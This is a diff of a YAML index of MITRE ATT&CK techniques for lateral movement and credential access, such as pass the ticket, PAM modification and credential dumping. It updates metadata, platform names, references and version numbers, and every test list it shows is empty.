+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -42485,7 +43166,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -42539,11 +43219,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42595,14 +43274,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42688,12 +43366,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42713,6 +43390,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42720,7 +43398,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42736,39 +43413,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42793,12 +43471,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42812,13 +43489,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -42835,7 +43511,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42883,7 +43559,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -42916,7 +43592,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -42955,7 +43630,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42989,12 +43664,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43022,10 +43695,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -43055,7 +43727,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -43117,12 +43788,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43146,11 +43816,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -43175,9 +43844,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -43237,7 +43905,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -43292,7 +43959,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -43360,12 +44026,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -43422,6 +44087,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43432,13 +44098,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -43497,7 +44162,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43591,49 +44255,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43648,20 +44273,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43741,12 +44403,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43775,6 +44436,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43786,18 +44448,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43824,14 +44486,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43955,12 +44614,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43975,10 +44633,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -43986,14 +44645,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -44036,14 +44695,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -44098,14 +44754,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44156,14 +44811,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44197,8 +44851,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -44215,11 +44869,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -44237,7 +44890,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -44254,10 +44907,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -44281,46 +44934,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
